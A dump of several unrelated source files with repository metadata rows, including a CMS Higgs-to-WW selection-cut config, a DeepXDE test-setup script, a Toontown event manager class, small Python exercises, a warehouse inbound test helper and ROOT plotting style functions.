# && (DNNvar >= 0.9) \
# && (std_vector_jet_pt[0]>30 && std_vector_jet_pt[1]>30) \
# && '+bVeto+' \
# '
#
#cuts['hww2l2v_13TeV_of2j_vbf_DNNlt09'] = '(std_vector_lepton_flavour[0] * std_vector_lepton_flavour[1] == -11*13) \
# && (abs(std_vector_lepton_flavour[1]) == 13 || std_vector_lepton_pt[1]>13) \
# && (mth>=60 && mth<125) \
# && (njet==2) \
# && (abs((std_vector_lepton_eta[0] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (abs((std_vector_lepton_eta[1] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (detajj>3.5 && mjj>=400) \
# && (DNNvar < 0.9) \
# && (std_vector_jet_pt[0]>30 && std_vector_jet_pt[1]>30) \
# && '+bVeto+' \
# '
#
#
#cuts['hww2l2v_13TeV_of2j_vbf_DNNgt08'] = '(std_vector_lepton_flavour[0] * std_vector_lepton_flavour[1] == -11*13) \
# && (abs(std_vector_lepton_flavour[1]) == 13 || std_vector_lepton_pt[1]>13) \
# && (mth>=60 && mth<125) \
# && (njet==2) \
# && (abs((std_vector_lepton_eta[0] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (abs((std_vector_lepton_eta[1] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (detajj>3.5 && mjj>=400) \
# && (DNNvar >= 0.8) \
# && (std_vector_jet_pt[0]>30 && std_vector_jet_pt[1]>30) \
# && '+bVeto+' \
# '
#
#cuts['hww2l2v_13TeV_of2j_vbf_DNNlt08'] = '(std_vector_lepton_flavour[0] * std_vector_lepton_flavour[1] == -11*13) \
# && (abs(std_vector_lepton_flavour[1]) == 13 || std_vector_lepton_pt[1]>13) \
# && (mth>=60 && mth<125) \
# && (njet==2) \
# && (abs((std_vector_lepton_eta[0] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (abs((std_vector_lepton_eta[1] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (detajj>3.5 && mjj>=400) \
# && (DNNvar < 0.8) \
# && (std_vector_jet_pt[0]>30 && std_vector_jet_pt[1]>30) \
# && '+bVeto+' \
# '
#
#cuts['hww2l2v_13TeV_of2j_vbf_DNNgt07'] = '(std_vector_lepton_flavour[0] * std_vector_lepton_flavour[1] == -11*13) \
# && (abs(std_vector_lepton_flavour[1]) == 13 || std_vector_lepton_pt[1]>13) \
# && (mth>=60 && mth<125) \
# && (njet==2) \
# && (abs((std_vector_lepton_eta[0] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (abs((std_vector_lepton_eta[1] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (detajj>3.5 && mjj>=400) \
# && (DNNvar >= 0.7) \
# && (std_vector_jet_pt[0]>30 && std_vector_jet_pt[1]>30) \
# && '+bVeto+' \
# '
#
#cuts['hww2l2v_13TeV_of2j_vbf_DNNlt07'] = '(std_vector_lepton_flavour[0] * std_vector_lepton_flavour[1] == -11*13) \
# && (abs(std_vector_lepton_flavour[1]) == 13 || std_vector_lepton_pt[1]>13) \
# && (mth>=60 && mth<125) \
# && (njet==2) \
# && (abs((std_vector_lepton_eta[0] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (abs((std_vector_lepton_eta[1] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (detajj>3.5 && mjj>=400) \
# && (DNNvar < 0.7) \
# && (std_vector_jet_pt[0]>30 && std_vector_jet_pt[1]>30) \
# && '+bVeto+' \
# '
#
#cuts['hww2l2v_13TeV_of2j_vbf_DNNgt06'] = '(std_vector_lepton_flavour[0] * std_vector_lepton_flavour[1] == -11*13) \
# && (abs(std_vector_lepton_flavour[1]) == 13 || std_vector_lepton_pt[1]>13) \
# && (mth>=60 && mth<125) \
# && (njet==2) \
# && (abs((std_vector_lepton_eta[0] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (abs((std_vector_lepton_eta[1] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (detajj>3.5 && mjj>=400) \
# && (DNNvar >= 0.6) \
# && (std_vector_jet_pt[0]>30 && std_vector_jet_pt[1]>30) \
# && '+bVeto+' \
# '
#
#cuts['hww2l2v_13TeV_of2j_vbf_DNNlt06'] = '(std_vector_lepton_flavour[0] * std_vector_lepton_flavour[1] == -11*13) \
# && (abs(std_vector_lepton_flavour[1]) == 13 || std_vector_lepton_pt[1]>13) \
# && (mth>=60 && mth<125) \
# && (njet==2) \
# && (abs((std_vector_lepton_eta[0] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (abs((std_vector_lepton_eta[1] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (detajj>3.5 && mjj>=400) \
# && (DNNvar < 0.6) \
# && (std_vector_jet_pt[0]>30 && std_vector_jet_pt[1]>30) \
# && '+bVeto+' \
# '
#cuts['hww2l2v_13TeV_of2j_vbf_DNNgt03'] = '(std_vector_lepton_flavour[0] * std_vector_lepton_flavour[1] == -11*13) \
# && (abs(std_vector_lepton_flavour[1]) == 13 || std_vector_lepton_pt[1]>13) \
# && (mth>=60 && mth<125) \
# && (njet==2) \
# && (abs((std_vector_lepton_eta[0] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (abs((std_vector_lepton_eta[1] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (detajj>3.5 && mjj>=400) \
# && (DNNvar >= 0.3) \
# && (std_vector_jet_pt[0]>30 && std_vector_jet_pt[1]>30) \
# && '+bVeto+' \
# '
#
#cuts['hww2l2v_13TeV_of2j_vbf_DNNlt03'] = '(std_vector_lepton_flavour[0] * std_vector_lepton_flavour[1] == -11*13) \
# && (abs(std_vector_lepton_flavour[1]) == 13 || std_vector_lepton_pt[1]>13) \
# && (mth>=60 && mth<125) \
# && (njet==2) \
# && (abs((std_vector_lepton_eta[0] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (abs((std_vector_lepton_eta[1] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (detajj>3.5 && mjj>=400) \
# && (DNNvar < 0.3) \
# && (std_vector_jet_pt[0]>30 && std_vector_jet_pt[1]>30) \
# && '+bVeto+' \
# '
#cuts['hww2l2v_13TeV_of2j_vbf_lowmjj'] = '(std_vector_lepton_flavour[0] * std_vector_lepton_flavour[1] == -11*13) \
# && (abs(std_vector_lepton_flavour[1]) == 13 || std_vector_lepton_pt[1]>13) \
# && (mth>=60 && mth<125) \
# && (njet==2) \
# && (abs((std_vector_lepton_eta[0] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (abs((std_vector_lepton_eta[1] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (detajj>3.5 && mjj>=400 && mjj<700) \
# && (std_vector_jet_pt[0]>30 && std_vector_jet_pt[1]>30) \
# && '+bVeto+' \
# '
#
#cuts['hww2l2v_13TeV_of2j_vbf_highmjj'] = '(std_vector_lepton_flavour[0] * std_vector_lepton_flavour[1] == -11*13) \
# && (abs(std_vector_lepton_flavour[1]) == 13 || std_vector_lepton_pt[1]>13) \
# && (mth>=60 && mth<125) \
# && (njet==2) \
# & (abs((std_vector_lepton_eta[0] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (abs((std_vector_lepton_eta[1] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (detajj>3.5 && mjj>=700) \
# && (std_vector_jet_pt[0]>30 && std_vector_jet_pt[1]>30) \
# && '+bVeto+' \
# '
#
#
# control regions
#
cuts['hww2l2v_13TeV_top_of2j_vbf'] = '(std_vector_lepton_flavour[0] * std_vector_lepton_flavour[1] == -11*13) \
&& (abs(std_vector_lepton_flavour[1]) == 13 || std_vector_lepton_pt[1]>13) \
&& mll>50 \
&& ( std_vector_jet_pt[0] >= 30 ) \
&& ( std_vector_jet_pt[1] >= 30 ) \
&& (njet==2) \
&& (detajj>3.5 && mjj>400) \
&& ( std_vector_jet_cmvav2[0]>-0.5884 || std_vector_jet_cmvav2[1]>-0.5884 ) \
'
cuts['hww2l2v_13TeV_dytt_of2j_vbf'] = '(std_vector_lepton_flavour[0] * std_vector_lepton_flavour[1] == -11*13) \
&& (abs(std_vector_lepton_flavour[1]) == 13 || std_vector_lepton_pt[1]>13) \
&& ( mth<60) \
&& mll>40 && mll<80 \
&& ( std_vector_jet_pt[0] >= 30 ) \
&& ( std_vector_jet_pt[1] >= 30 ) \
&& (njet==2) \
&& (detajj>3.5 && mjj>400) \
&& '+bVeto+' \
'
# 11 = e
# 13 = mu
# 15 = tau
| [
"[email protected]"
] | |
4cb9216fe42a1d68811c6513183c40488acaff47 | bb150497a05203a718fb3630941231be9e3b6a32 | /models_restruct/deepxde/tools/start.py | 7e9ecf8ec9ecf1528bb5f166d1ce332103f5b5aa | [] | no_license | PaddlePaddle/PaddleTest | 4fb3dec677f0f13f7f1003fd30df748bf0b5940d | bd3790ce72a2a26611b5eda3901651b5a809348f | refs/heads/develop | 2023-09-06T04:23:39.181903 | 2023-09-04T11:17:50 | 2023-09-04T11:17:50 | 383,138,186 | 42 | 312 | null | 2023-09-13T11:13:35 | 2021-07-05T12:44:59 | Python | UTF-8 | Python | false | false | 6,862 | py | """
start before model running
"""
import os
import sys
import json
import shutil
import urllib
import logging
import wget
logger = logging.getLogger("ce")
class DeepXDE_Start(object):
    """
    Prepare the runtime environment for a DeepXDE model test run.

    All run parameters come from environment variables set by the CI driver
    (qa_yaml_name, rd_yaml_path, reponame, system, step, paddle_whl, mode).
    """
    def __init__(self):
        """
        Read the run configuration from the environment and derive the model
        name from the yaml case name (text after the last "^").
        """
        self.qa_yaml_name = os.environ["qa_yaml_name"]
        self.rd_yaml_path = os.environ["rd_yaml_path"]
        logger.info("###self.qa_yaml_name: {}".format(self.qa_yaml_name))
        self.reponame = os.environ["reponame"]
        self.system = os.environ["system"]
        self.step = os.environ["step"]
        logger.info("###self.step: {}".format(self.step))
        self.paddle_whl = os.environ["paddle_whl"]
        self.mode = os.environ["mode"]  # function or precision
        self.REPO_PATH = os.path.join(os.getcwd(), self.reponame)
        self.env_dict = {}
        self.model = self.qa_yaml_name.split("^")[-1]
        logger.info("###self.model_name: {}".format(self.model))
        self.env_dict["model"] = self.model
        os.environ["model"] = self.model
    def prepare_gpu_env(self):
        """
        Choose GPU or CPU execution from the target system name:
        systems containing "cpu" or "mac" run on CPU, everything else on GPU.
        """
        if "cpu" in self.system or "mac" in self.system:
            self.env_dict["set_cuda_flag"] = "cpu"  # decided by the system name
        else:
            self.env_dict["set_cuda_flag"] = "gpu"  # decided by the system name
        return 0
    def add_paddle_to_pythonpath(self):
        """
        Put the local "deepxde" checkout first on PYTHONPATH and select the
        paddle backend via the DDE_BACKEND environment variable.
        """
        cwd = os.getcwd()
        paddle_path = os.path.join(cwd, "deepxde")
        old_pythonpath = os.environ.get("PYTHONPATH", "")
        new_pythonpath = f"{paddle_path}:{old_pythonpath}"
        os.environ["PYTHONPATH"] = new_pythonpath
        os.environ["DDE_BACKEND"] = "paddle"
        return 0
    def alter(self, file, old_str, new_str, flag=True, except_str="model.train(0"):
        """
        Rewrite *file* in place, replacing old_str with new_str line by line.

        flag=True:  only lines containing old_str but neither new_str nor
                    except_str are rewritten (avoids double substitution).
        flag=False: every line containing old_str is rewritten.
        """
        file_data = ""
        with open(file, "r", encoding="utf-8") as f:
            for line in f:
                if flag:
                    if old_str in line and new_str not in line and except_str not in line:
                        line = line.replace(old_str, new_str)
                else:
                    if old_str in line:
                        line = line.replace(old_str, new_str)
                file_data += line
        with open(file, "w", encoding="utf-8") as f:
            f.write(file_data)
        return 0
    def add_seed(self, file, old_str, new_str):
        """
        Append new_str right after every line of *file* containing old_str
        (used to inject imports / seeding after "import deepxde").
        """
        file_data = ""
        with open(file, "r", encoding="utf-8") as f:
            for line in f:
                if old_str in line:
                    if old_str == "L-BFGS":
                        # Only match unindented (top-level) "L-BFGS" lines.
                        if "    " not in line:
                            # NOTE(review): flag_LBFGS is never initialised at
                            # module scope; it only exists after this branch runs.
                            global flag_LBFGS
                            flag_LBFGS = True
                            line += new_str
                    else:
                        line += new_str
                        # line += "paddle.seed(1)\n"
                        # line += "np.random.seed(1)\n"
                file_data += line
        with open(file, "w", encoding="utf-8") as f:
            f.write(file_data)
        return 0
    def change_backend(self, file, backend, flag):
        """
        Toggle backend-specific sections of an example script in place.

        flag=True:  after a line containing *backend*, strip the "# " comment
                    marker from following lines until a line without "# "
                    (or a "Backend jax" line) ends the section.
        flag=False: after a line containing *backend*, prefix following lines
                    with "# " until a "Backend paddle" line ends the section.
        """
        file_data = ""
        if flag is True:
            index = False
            with open(file, "r", encoding="utf-8") as f:
                for line in f:
                    if index is True:
                        if "# " in line and "Backend jax" not in line:
                            line = line.replace("# ", "")
                        else:
                            index = False
                    if backend in line:
                        index = True
                    file_data += line
            with open(file, "w", encoding="utf-8") as f:
                f.write(file_data)
        else:
            index = False
            with open(file, "r", encoding="utf-8") as f:
                for line in f:
                    if index is True:
                        if "Backend paddle" not in line:
                            line = "# " + line
                        else:
                            index = False
                    if backend in line:
                        index = True
                    file_data += line
            with open(file, "w", encoding="utf-8") as f:
                f.write(file_data)
        return 0
    def get_example_dir(self):
        """
        Map the yaml case name to the example script path, e.g.
        "lulu^examples^pinn" -> "deepxde/examples/pinn.py".
        """
        example_dir = self.qa_yaml_name.replace("^", "/")
        if "lulu" in example_dir:
            example_dir = "deepxde" + example_dir[4:] + ".py"
        elif "rd" in example_dir:
            # NOTE(review): substring test -- any name containing "rd" matches,
            # and [2:] assumes the prefix is exactly "rd"; confirm.
            example_dir = "deepxde" + example_dir[2:] + ".py"
        return example_dir
    def get_deepxde_data(self):
        """
        Copy the bundled example datasets into the working directory.
        """
        os.system("cp -r deepxde/examples/dataset/ ./")
        return 0
    def build_prepare(self):
        """
        Run the preparation steps and export env_dict (JSON) under the repo
        name so later pipeline steps can consume it.
        """
        ret = 0
        ret = self.prepare_gpu_env()
        if ret:
            logger.info("build prepare_gpu_env failed")
            return ret
        os.environ[self.reponame] = json.dumps(self.env_dict)
        return ret
    def download_datasets(self):
        """
        Fetch the extra datasets archive and unpack it into deepxde/.
        """
        url = "https://paddle-qa.bj.bcebos.com/deepxde/datasets.tar.gz"
        file_name = "datasets.tar.gz"
        # NOTE(review): uses urllib.request although the module only does
        # "import urllib" -- confirm the submodule is actually loaded.
        urllib.request.urlretrieve(url, file_name)
        os.system("tar -zxvf " + file_name + " -C deepxde/")
        return 0
def run():
    """
    Entry point: prepare the environment, patch the example script for the
    paddle backend, inject deterministic seeding, and fetch extra datasets
    for the "antiderivative" cases.

    NOTE: the alter() calls are order-dependent -- the first rewrites
    model.train( to add display_every=1, and the second then prefixes the
    (already rewritten) call with "losshistory, train_state = ".
    """
    model = DeepXDE_Start()
    model.build_prepare()
    model.add_paddle_to_pythonpath()
    model.get_deepxde_data()
    filedir = model.get_example_dir()
    model.alter(filedir, "tf", "paddle")
    # Uncomment the paddle section, comment out the tensorflow.compat.v1 one.
    model.change_backend(filedir, "Backend paddle", True)
    model.change_backend(filedir, "Backend tensorflow.compat.v1", False)
    model.alter(filedir, "model.train(", "model.train(display_every=1,", True, "model.train(0")
    model.alter(filedir, "model.train(", "losshistory, train_state = model.train(")
    # Remove any pre-existing display_every settings left in the script.
    model.alter(filedir, "display_every=1000,", " ", False)
    model.alter(filedir, "display_every=1000", " ", False)
    model.alter(filedir, "display_every=500", " ", False)
    model.add_seed(filedir, "import deepxde", "import paddle\n")
    # add_seed(filedir, "import paddle", "paddle.seed(1)\n")
    model.add_seed(filedir, "import deepxde", "import numpy as np\n")
    model.add_seed(filedir, "import deepxde", "dde.config.set_random_seed(1)\n")
    if "antiderivative" in model.qa_yaml_name:
        model.download_datasets()
    return 0
if __name__ == "__main__":
    run()
| [
"[email protected]"
] | |
2a3afbad100efcb1edda22e3475a09ff6d227fab | 7949f96ee7feeaa163608dbd256b0b76d1b89258 | /toontown/ai/DistributedPhaseEventMgr.py | 2a79a55ca8df3ac10529506eb7476344ed65df63 | [] | no_license | xxdecryptionxx/ToontownOnline | 414619744b4c40588f9a86c8e01cb951ffe53e2d | e6c20e6ce56f2320217f2ddde8f632a63848bd6b | refs/heads/master | 2021-01-11T03:08:59.934044 | 2018-07-27T01:26:21 | 2018-07-27T01:26:21 | 71,086,644 | 8 | 10 | null | 2018-06-01T00:13:34 | 2016-10-17T00:39:41 | Python | UTF-8 | Python | false | false | 1,096 | py | # File: t (Python 2.4)
from direct.directnotify import DirectNotifyGlobal
from direct.distributed import DistributedObject
import datetime
class DistributedPhaseEventMgr(DistributedObject.DistributedObject):
    """Distributed object tracking a phased event: running state, number of
    phases, current phase and the scheduled phase dates."""

    notify = DirectNotifyGlobal.directNotify.newCategory('DistributedPhaseEventMgr')

    def __init__(self, cr):
        DistributedObject.DistributedObject.__init__(self, cr)
        # Filled by setDates() with datetime objects built from
        # (year, month, day, hour, minute, second) sequences.
        self.holidayDates = []

    # --- setters invoked by the distributed-object layer ---

    def setIsRunning(self, isRunning):
        self.isRunning = isRunning

    def setNumPhases(self, numPhases):
        self.numPhases = numPhases

    def setCurPhase(self, curPhase):
        self.curPhase = curPhase

    def setDates(self, holidayDates):
        self.holidayDates.extend(
            datetime.datetime(d[0], d[1], d[2], d[3], d[4], d[5])
            for d in holidayDates
        )

    # --- accessors ---

    def getIsRunning(self):
        return self.isRunning

    def getNumPhases(self):
        return self.numPhases

    def getCurPhase(self):
        return self.curPhase
| [
"[email protected]"
] | |
0f20585a844977b4362a9860a036f47b28823b97 | ecf1ce6f8b592f76c7b7c253608c1264ae0676a3 | /days/day017/list_comprehensions_and_generators.py | 78d9123b75c5cf83388f77dff5985392cf955d59 | [] | permissive | alex-vegan/100daysofcode-with-python-course | 94e99880a50ac412e398ad209ed53796f253641f | b6c12316abe18274b7963371b8f0ed2fd549ef07 | refs/heads/master | 2021-07-20T23:05:59.721661 | 2019-01-21T16:18:25 | 2019-01-21T16:18:25 | 150,115,516 | 0 | 0 | MIT | 2018-09-24T14:28:16 | 2018-09-24T14:28:15 | null | UTF-8 | Python | false | false | 1,006 | py | from random import sample
from itertools import islice
from pprint import pprint as pp
# Default roster shared by the helpers below.
NAMES = ['arnold schwarzenegger', 'alec baldwin', 'bob belderbos',
         'julian sequeira', 'sandra bullock', 'keanu reeves',
         'julbob pybites', 'bob belderbos', 'julian sequeira',
         'al pacino', 'brad pitt', 'matt damon', 'brad pitt']


def convert_title_case_names(names=NAMES):
    """Title-case every name ("john doe" -> "John Doe")."""
    return list(map(str.title, names))


def reverse_first_last_names(names=NAMES):
    """Swap the word order inside each name ("john doe" -> "doe john")."""
    def flip(full_name):
        return " ".join(reversed(full_name.split()))
    return [flip(full_name) for full_name in names]


def gen_pairs(names=NAMES):
    """Endlessly yield random '<First> teams up with <First>' pairings."""
    while True:
        first, second = (person.split()[0].title() for person in sample(names, 2))
        yield f"{first} teams up with {second}"
'''
if __name__ == "__main__":
print(convert_title_case_names())
print('-'*101)
print(reverse_first_last_names())
print('-'*101)
pairs = gen_pairs()
for _ in range(10):
print(next(pairs))
print('-'*101)
pp(list(islice(pairs, 10)))
'''
| [
"[email protected]"
] | |
83ef4a6d7e5cdbfb45c05ea36208a409740e1e33 | 2280e309df300fe1d4cd684799b9aeeb3495c6cc | /core/inbound.py | c6ecbcc422d08468584f3ea64b30969da4f41629 | [] | no_license | cming091/psshutlle-toots | 471fe1a9505116b6d9571259e9de04b3d7404f98 | 1445c2efd024fe33743c09bac799ed9f4a3f15cb | refs/heads/master | 2023-05-30T12:34:39.364337 | 2021-06-21T07:23:23 | 2021-06-21T07:23:23 | 378,834,840 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,856 | py | import time
import os
from .base import Base
from config import CONF
# NOTE(review): the star import is what supplies LogHandler (and presumably
# RequestApi used below) -- confirm against utils' public names.
from utils import *
from psgrpc import wholeInboundBcr
logger = LogHandler(__name__)  # module-level logger (LogHandler from utils)
class Inbound(Base):
    """Drives one inbound (put-away) flow against the TES/WES HTTP services.

    All per-run parameters (warehouse ids, container code, sku, node ids,
    the key name of the service return code, ...) come from the ``data``
    dict handed to the constructor; shared HTTP/DB helpers come from Base.
    """
    def __init__(self, data):
        super(Inbound,self).__init__(data)
    def singleProcess(self):
        """Run one end-to-end inbound: clean tables, register the frame
        (simulation only), create the work order, then trigger and verify.

        Returns the container code; sets self.statusCode on failure paths.
        """
        # Reset stock/assignment tables before the run.
        self.common.tearDownStockAndAssignTables(self.db,self.data, defaultdbs=['wes'])
        if self.data['isSimulate']:
            status = self.registerFrame()
            if not status:
                self.statusCode = 402  # frame registration failed
                raise Exception('[{} registerFrame error]'.format(self.data['sName']))
            else:
                logger.info('[{} registerFrame succ]'.format(self.data['sName']))
                time.sleep(CONF['delay'])  # let the service settle between calls
        # NOTE(review): creatAggs/checkAggOpStatus/checkBound/sqlRmAllPods are
        # not defined in this module -- presumably inherited from Base; confirm.
        if self.addWorkOrder():
            logger.info('[{} addWorkOrder succ]'.format(self.data['sName']))
            time.sleep(CONF['delay'])
            if self.creatAggs():
                logger.info('[{} creatAggs succ]'.format(self.data['sName']))
                time.sleep(CONF['delay'])
                self.triggerBcr()
                self.checkAggOpStatus()
                self.checkBound()
            else:
                self.statusCode = 404  # aggregation creation failed
        else:
            self.statusCode = 403  # work-order creation failed
        return self.data['containerCode']
    def registerFrame(self):
        """Register the frame at its node via the TES HTTP API.

        Returns True when the service answers with return code 0.
        """
        self.sqlRmStartNodePods()  # free the start node first
        data = {
            "warehouseID": self.data['warehouseID'],
            "frameID": self.data['frameID'],
            "nodeID": self.data['nodeID'],
            "dir": 1
        }
        url = '{}/tes/api/frame/registerFrame'.format(CONF['baseUrl'])
        # NOTE: "sendReuest" (sic) is the actual spelling of the helper's name.
        res = RequestApi.sendReuest('registerFrame', 'POST', url, data).json()
        logger.info('[{} registerFrame: res:{}]'.format(self.data['sName'],res))
        if res.get(self.data['returnCode'], None) == 0:
            return True
        return False
    def init(self):
        """Reset helper: remove all pods (used when (re)initialising a run)."""
        logger.info('[{} init ]'.format(self.data['sName']))
        self.sqlRmAllPods()
    def triggerBcr(self):
        """Invoke the wholeInboundBcr gRPC helper and log its result."""
        info = wholeInboundBcr(self.data['ip'],self.data['warehouseCode'],self.data['containerCode'],self.data['warehouseID'])
        logger.info('[{} bcr res:{}]'.format(self.data['sName'],info))
    def addWorkOrder(self):
        """Create the inbound work order via the inventory-transaction API.

        Returns True when the service answers with return code 0.
        """
        url = '{}/invtransaction/api/workorder/inbound/add'.format(CONF['baseUrl'])
        # NOTE(review): bizDate (epoch ms) and destination are hard-coded
        # fixture values -- confirm they are intentional test constants.
        data ={
            "woNo": self.data['no'],
            "warehouseCode": self.data['warehouseCode'],
            "regionCode": self.data['regionCode'],
            "waveNo": self.data['no'],
            "inBoundNo": self.data['no'],
            "originStation": "PS-IN-001",
            "priority": 0,
            "transportUnit": self.data['containerCode'],
            "containerCode": self.data['containerCode'],
            "skuCode": self.data['skuCode'],
            "skuName": self.data['skuName'],
            "lot": "",
            "grade": 0,
            "quantity": self.data['quantity'],
            "boxQuantity": 1,
            "bizType": 1,
            "transType": self.data['transType'],
            "bizDate": 1594292882000,
            "destination": "309843433806102535",
            "rely_wo_no": "",
            "extension": "",
            "user": "user",
            'palletModel':0,
        }
        res = RequestApi.sendReuest('addWorkOrder', 'POST', url, data, headers=self.headers).json()
        logger.info('[{} addWorkOrder: res:{}]'.format(self.data['sName'],res))
        if res.get(self.data['returnCode'],None) == 0:
            return True
        return False
    def sqlRmStartNodePods(self):
        """Delete frame rows with status=1 at the configured start node."""
        sql = 'delete from tes.frame where status=1 and node=\'{}\';'.format(self.data['startNodeId'])
        self.db.get_connection('tes')
        res = self.db.execute('tes', sql)
        logger.info('[{} sqlRmStartNodePods tes res:{}]'.format(self.data['sName'],res))
| [
"[email protected]"
] | |
dcc7adaa49fada352d2eb346c9e51df6ed8c9dd4 | 0a5c468cee07b79ddb5368aa7b0fe118f4b11e72 | /lazy_slides/download.py | 72beca49e25d6ab0de60cb57f0674c4ab1b133c7 | [] | no_license | abingham/lazy_slides | c36e451571c14e53cbc2817d4f72475fa5c400ba | ca8eb4618415df6eaa9fb3c3f721cb168708f52b | refs/heads/master | 2020-05-19T16:34:20.286129 | 2013-06-18T17:58:05 | 2013-06-18T17:58:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,018 | py | import contextlib
import logging
import os
import urllib2   # Python 2 only; urllib.request in Python 3
import urlparse  # Python 2 only; urllib.parse in Python 3
import uuid
log = logging.getLogger(__name__)  # module-level logger
def download(url, directory):
    '''Fetch *url* and store it under *directory* with a collision-proof name.

    The saved file keeps the original base name and extension, with a
    random UUID spliced in between so repeated downloads never clash.

    :param url: The URL to download.
    :param directory: The directory into which to save the file.
    :return: The path of the file that was written.
    '''
    parsed = urlparse.urlparse(url)

    # Build "<stem>_<uuid><ext>" from the URL's path component.
    base = os.path.basename(parsed.path)
    stem, ext = os.path.splitext(base)
    filename = os.path.join(directory, '{}_{}{}'.format(stem, uuid.uuid4(), ext))

    log.info('Downloading {} to {}'.format(url, filename))

    # Stream the URL contents into the target file, closing both handles.
    with contextlib.closing(urllib2.urlopen(url)) as infile:
        with open(filename, 'wb') as outfile:
            outfile.write(infile.read())

    return filename
| [
"[email protected]"
] | |
80cd8baa4841a770e7eb7696c77d6f7a99d12ad2 | 23130cd12e38dbce8db8102810edaad70b240ae2 | /lintcode/235.py | e2c5a50114f99694f5bfed245e493ea6148b0de9 | [
"MIT"
] | permissive | kangli-bionic/algorithm | ee6687c82101088db20f10fb958b4e45e97d3d31 | c3c38723b9c5f1cc745550d89e228f92fd4abfb2 | refs/heads/master | 2023-01-05T09:29:33.204253 | 2020-10-25T17:29:38 | 2020-10-25T17:29:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 510 | py | """
235. Prime Factorization
https://www.lintcode.com/problem/prime-factorization/
"""
import math
class Solution:
    """
    @param num: An integer
    @return: an integer array
    """
    def primeFactorization(self, num):
        # Trial division: peel each divisor off up to sqrt(num); whatever
        # survives (> 1) is itself prime and becomes the final factor.
        factors = []
        remaining = num
        divisor = 2
        bound = math.sqrt(num)
        while remaining > 1 and divisor <= bound:
            quotient, leftover = divmod(remaining, divisor)
            if leftover == 0:
                factors.append(divisor)
                remaining = quotient
            else:
                divisor += 1
        if remaining > 1:
            factors.append(remaining)
        return factors
| [
"[email protected]"
] | |
8879d084898863cce23dedb47389a370ebb7adcf | 11a1e1140fe869e83e337518ca99162cca8780dd | /BHScripts_8TeV_postICHEP_Final_WithRun2012C_NewFitRange/histograms/DataAnalysis_FitRanges/Styles.py | ec5775c7f79b34278912b0d67309b9cfba720b4c | [] | no_license | jhakala/BHMacros | 6bdd1ac855df8a803f39f06e7e218b24b2eb76b1 | bc3cf2e3c1d3570a9e042c865214035e60d20021 | refs/heads/master | 2021-01-19T04:52:27.624800 | 2015-04-09T12:14:21 | 2015-04-09T12:14:21 | 33,666,386 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,718 | py | pattle = [862, 814, 797, 899, 614, 921]
marker = [20, 21, 22, 25, 24, 26]  # ROOT marker styles paired with the colour palette
from ROOT import gStyle
from ROOT import gROOT
from ROOT import TStyle
# Global pad margins, applied once at import time.
gStyle.SetPadTopMargin(0.05)
gStyle.SetPadRightMargin(0.05)
def formatST(h):
    """Style the S_T distribution histogram *h*: marker, colours, axis titles."""
    h.SetMarkerStyle(20)
    h.SetMarkerColor(923)
    h.SetLineColor(923)
    h.SetXTitle("S_{T} (GeV)")
    # Fold the bin width into the y-axis label, e.g. "Events / 100 GeV".
    h.SetYTitle("Events / %d GeV" % h.GetBinWidth(1))
    h.GetYaxis().SetTitleOffset(1.2)
def formatTemplate(f, N, iformula):
    """Style a template function: width 2, palette colour by formula index,
    and a line style keyed on the parameter count N (1 for N=2, 2 for N=3;
    other values of N leave the line style untouched)."""
    f.SetLineWidth(2)
    f.SetLineColor(pattle[iformula])
    style_for_n = {2: 1, 3: 2}
    if N in style_for_n:
        f.SetLineStyle(style_for_n[N])
def formatUncertainty(g):
    """Style the uncertainty-band graph *g* (line/fill colours, axis titles)."""
    g.SetLineWidth(2)
    g.SetFillColor(862)
    #g.SetLineColor(33)
    g.SetLineColor(862)
    # NOTE(review): this second SetFillColor overrides the 862 set above,
    # so the effective fill colour is 33 -- confirm that is intended.
    g.SetFillColor(33)
    #g.SetFillStyle()
    g.GetXaxis().SetTitle("S_{T} (GeV)")
    g.GetYaxis().SetTitle("Events / 100 GeV")
    g.GetYaxis().SetTitleOffset(1.2)
def formatCL(g, type, width=4):
    """Style a confidence-limit graph: common axis titles plus a colour
    scheme keyed on *type* ("CL95": colour 862; "CLA": colour 899, dashed;
    any other value only gets the width and titles).

    NOTE(review): the parameter name shadows the ``type`` builtin.
    """
    g.SetLineWidth(width)
    g.GetXaxis().SetTitle("S_{T}^{ min} (GeV)")
    g.GetXaxis().SetNdivisions(5,5,0)
    g.GetYaxis().SetTitle("#sigma(S_{T} > S_{T}^{ min}) #times A (pb)")
    g.GetYaxis().SetTitleOffset(1.2)
    if type == "CL95":
        g.SetLineColor(862)
        g.SetFillColor(862)
    elif type == "CLA":
        g.SetLineColor(899)
        g.SetFillColor(899)
        g.SetLineStyle(2)
def formatXsecCL(g, icolor, line_style=1):
    """Style a cross-section limit curve using palette entry *icolor*."""
    g.SetLineWidth(2)
    g.SetLineColor(pattle[icolor])
    g.SetLineStyle(line_style)
    g.SetMarkerColor(pattle[icolor])
    g.SetMarkerSize(1)
    g.GetXaxis().SetTitle("M_{BH}^{ min} (TeV)")
